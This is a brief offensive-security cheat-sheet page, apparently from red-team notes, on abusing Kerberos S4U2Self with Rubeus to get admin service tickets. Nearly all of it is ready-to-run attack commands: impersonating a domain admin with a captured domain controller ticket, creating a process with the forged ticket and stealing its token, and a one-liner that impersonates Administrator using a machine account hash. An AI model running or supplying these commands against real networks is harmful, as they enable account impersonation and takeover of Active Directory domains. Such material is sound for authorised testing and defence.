S4U2Self Abuse
Machines do not get remote local admin access to themselves.
What we can do instead is abuse S4U2Self to obtain a usable TGS as a user we know is a local admin (e.g. a domain admin). Rubeus has a /self flag for this purpose.
We will use caught Domain Controller Ticket from Unconstrained Delegation.
Abuse to obtain useable TGS as a user who we know is local admin
Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrapRubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=
[+] ProcessID : 3608steal_token 3608Example one-liner
Rubeus.exe s4u /domain:ZSM.LOCAL /impersonateuser:Administrator /self /altservice:cifs/ZPH-SVRMGMT1.ZSM.LOCAL /dc:192.168.210.10 /user:ZPH-SVRMGMT1$ /rc4:89d0b5687...ad336a77b8ef2f /pttLast updated